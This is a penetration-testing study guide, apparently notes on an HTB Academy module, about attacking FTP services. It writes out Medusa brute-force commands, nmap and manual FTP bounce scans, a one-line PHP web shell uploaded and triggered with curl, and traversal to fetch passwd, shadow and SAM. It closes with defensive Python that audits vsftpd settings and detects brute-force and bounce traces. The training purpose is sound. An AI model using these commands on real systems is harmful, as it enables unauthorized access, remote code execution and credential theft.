FTP Attacks
Overview
This document covers exploitation techniques against FTP services, focusing on practical attack methodologies from HTB Academy's "Attacking Common Services" module. Unlike enumeration, these techniques aim to gain unauthorized access, escalate privileges, or exploit misconfigurations.
"The File Transfer Protocol (FTP) is a standard network protocol used to transfer files between computers. We can abuse misconfigurations or excessive privileges, exploit known vulnerabilities or discover new vulnerabilities."
FTP Attack Methodology
Attack Chain Overview
Service Discovery → Misconfiguration Analysis → Authentication Attacks → File System Exploitation → Privilege Escalation
Key Attack Objectives
Unauthorized file access through anonymous authentication
Credential compromise via brute force attacks
Network pivoting using FTP bounce attacks
Remote code execution through file upload capabilities
Information disclosure via configuration analysis
Misconfiguration Exploitation
Anonymous Access Abuse
Anonymous Authentication Attack
# Test anonymous access
ftp target_ip
# Username: anonymous
# Password: anonymous (or any email address)
# HTB Academy example session:
$ ftp 192.168.2.142
Connected to 192.168.2.142.
220 (vsFTPd 2.3.4)
Name (192.168.2.142:user): anonymous
331 Please specify the password.
Password: anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Mass Data Extraction
# Automated download of accessible files
wget -m --no-passive ftp://anonymous:anonymous@target_ip
# Results in organized directory structure
tree target_ip/
└── target_ip
    ├── sensitive_documents/
    │   ├── passwords.txt
    │   ├── database_config.ini
    │   └── employee_list.xlsx
    └── backup_files/
        └── system_backup.tar.gz
Authentication Attacks
Brute Force with Medusa
Basic Medusa Usage
# Single user brute force
medusa -u admin -P /usr/share/wordlists/rockyou.txt -h target_ip -M ftp
# HTB Academy example:
medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp
# Expected output:
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ftp] Host: 10.129.203.7 (1 of 1, 0 complete) User: fiona (1 of 1, 0 complete) Password: 123456 (1 of 14344392 complete)
ACCOUNT FOUND: [ftp] Host: 10.129.203.7 User: fiona Password: family [SUCCESS]
Advanced Medusa Attacks
# Multi-user brute force
medusa -U userlist.txt -P passwords.txt -h target_ip -M ftp
# Targeted attack with common passwords
medusa -u admin -p admin,password,123456,ftp,root -h target_ip -M ftp
# Slow brute force to avoid detection
medusa -u admin -P passwords.txt -h target_ip -M ftp -t 1 -s 5
FTP Bounce Attack Exploitation
HTB Academy FTP Bounce Implementation
# Nmap FTP bounce scan
nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2
# Expected output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to ftp://anonymous:password@10.10.110.213:21
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.
PORT STATE SERVICE
80/tcp open http
Manual FTP Bounce Attack
# Connect to FTP server
ftp vulnerable_ftp_server
# Use PORT command to target internal host
ftp> port 192,168,1,100,0,22 # Target 192.168.1.100:22
200 PORT command successful.
# Trigger connection with LIST
ftp> list
150 Here comes the directory listing.
# Connection attempt made to target
File System Exploitation
Web Shell Upload Attack
# Create PHP web shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Upload to web-accessible directory
ftp> cd /var/www/html
ftp> put shell.php
ftp> quit
# Execute commands
curl "http://target_ip/shell.php?cmd=whoami"
Directory Traversal Attacks
# Test directory traversal
ftp> cd ../../../etc
ftp> get passwd
ftp> get shadow
# Windows traversal
ftp> cd ..\..\..\Windows\System32
ftp> get SAM
FTP Attack Checklist
Authentication Attacks
Exploitation Attacks
Post-Exploitation
HTB Academy Lab Scenarios
Scenario 1: Anonymous Access Exploitation
# Target has anonymous FTP with write access to web directory
ftp target_ip
# Username: anonymous, Password: anonymous
# Upload web shell to web-accessible directory
ftp> cd htdocs
ftp> put shell.php
ftp> quit
# Achieve remote code execution
curl "http://target_ip/shell.php?cmd=whoami"
Scenario 2: Brute Force with Medusa
# Discovered username through enumeration: fiona
medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h target_ip -M ftp
# Result: fiona:family
# Access FTP and extract sensitive files
Scenario 3: FTP Bounce Attack
# Use FTP server to scan internal network
nmap -Pn -v -n -p80 -b anonymous:password@ftp_server internal_target
# Discover internal services through FTP proxy
Key Attack Insights
Attack Effectiveness Factors
Anonymous access - Immediate exploitation opportunity
Write permissions - Enable file upload attacks
Web directory access - Direct path to code execution
Weak credentials - Entry point for authorized access
Internal network position - Pivot for lateral movement
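Most of the factors listed above correspond to explicit server settings, so they can be audited before an assessor finds them. The following is an added example, not part of the original page or the HTB module: a small auditor for vsftpd.conf text (vsFTPd is the server shown in the banners above). The sample configuration is constructed, and the web root prefixes are an assumption.

```python
# Constructed sample vsftpd.conf (not from the page or any real host).
SAMPLE_CONF = """\
listen=YES
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_root=/var/www/html
port_promiscuous=YES
"""

# vsftpd options that are risky when explicitly set to YES, with the reason.
RISKY_WHEN_YES = {
    "anonymous_enable": "anonymous logins are accepted",
    "anon_upload_enable": "anonymous users may upload files",
    "anon_mkdir_write_enable": "anonymous users may create directories",
    "anon_other_write_enable": "anonymous users may delete or rename files",
    "port_promiscuous": "PORT targets are not checked against the client address",
    "pasv_promiscuous": "PASV connections are not checked against the client address",
}
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx")  # assumed web root prefixes


def parse_conf(text):
    """Parse vsftpd's option=value lines; lines starting with '#' are comments."""
    opts = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, _, value = line.partition("=")
            opts[key.strip().lower()] = value.strip()
    return opts


def audit(text):
    """Return a list of 'option: reason' findings for a vsftpd.conf text."""
    opts = parse_conf(text)
    findings = [f"{key}: {why}" for key, why in RISKY_WHEN_YES.items()
                if opts.get(key, "").upper() == "YES"]
    for key in ("anon_root", "local_root"):
        root = opts.get(key, "")
        if root.startswith(WEB_ROOTS):
            findings.append(f"{key}: FTP root {root} lies under a web root prefix")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONF):
        print(finding)
```

The auditor only reports options that are set explicitly; options left at their compiled-in defaults need to be checked against the documentation for the installed vsftpd version.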
Common Attack Patterns
Reconnaissance → Anonymous testing → File extraction
Brute force → Credential discovery → Privilege abuse
Bounce attack → Internal scanning → Lateral movement
File upload → Web shell → Remote code execution
Configuration abuse → Persistence → Privilege escalation
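The brute force and bounce patterns above both leave recognizable traces on the FTP control channel: repeated 530 replies to PASS, and PORT arguments that name a host other than the connected client. The following is an added detection example, not part of the original page; the event tuple format and the trace are constructed for illustration, and the threshold of 5 is an assumption.

```python
import ipaddress
from collections import Counter

# Constructed control-channel events: (client_ip, client_command, server_reply_code).
SAMPLE_TRACE = (
    [("10.10.14.5", "USER fiona", 331), ("10.10.14.5", "PASS ****", 530)] * 6
    + [
        ("10.10.14.9", "USER anonymous", 331),
        ("10.10.14.9", "PASS ****", 230),
        ("10.10.14.9", "PORT 192,168,1,100,0,22", 200),  # third-party host, port 22
        ("10.10.14.9", "PORT 10,10,14,9,195,80", 200),   # client's own address, port 50000
        ("10.10.14.9", "PORT 10,10,14,9,999,1", 501),    # malformed argument
    ]
)


def decode_port(arg):
    """Decode an RFC 959 PORT argument 'h1,h2,h3,h4,p1,p2' into (ip, port)."""
    fields = [int(f) for f in arg.split(",")]
    if len(fields) != 6 or any(not 0 <= f <= 255 for f in fields):
        raise ValueError(f"malformed PORT argument: {arg!r}")
    ip = ipaddress.IPv4Address(".".join(map(str, fields[:4])))
    return str(ip), fields[4] * 256 + fields[5]


def bounce_findings(trace):
    """Flag PORT commands that are malformed or do not point back at the client."""
    findings = []
    for client, command, _reply in trace:
        verb, _, arg = command.partition(" ")
        if verb.upper() != "PORT":
            continue
        try:
            target, port = decode_port(arg.strip())
        except ValueError:
            findings.append((client, arg.strip(), "malformed"))
            continue
        reasons = ["third-party address"] if target != client else []
        if port < 1024:  # RFC 2577 advises refusing data connections to low ports
            reasons.append("privileged port")
        if reasons:
            findings.append((client, f"{target}:{port}", ", ".join(reasons)))
    return findings


def bruteforce_findings(trace, threshold=5):
    """Return {client_ip: count} for clients with >= threshold rejected PASS commands."""
    failures = Counter(client for client, cmd, reply in trace
                       if cmd.upper().startswith("PASS") and reply == 530)
    return {client: n for client, n in failures.items() if n >= threshold}
```

A client behind NAT can legitimately send a private address in PORT, so an address mismatch is a signal to correlate with the destination and port rather than a verdict on its own.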
This document provides comprehensive FTP attack methodologies based on HTB Academy's "Attacking Common Services" module, focusing on practical exploitation techniques for penetration testing and security assessment.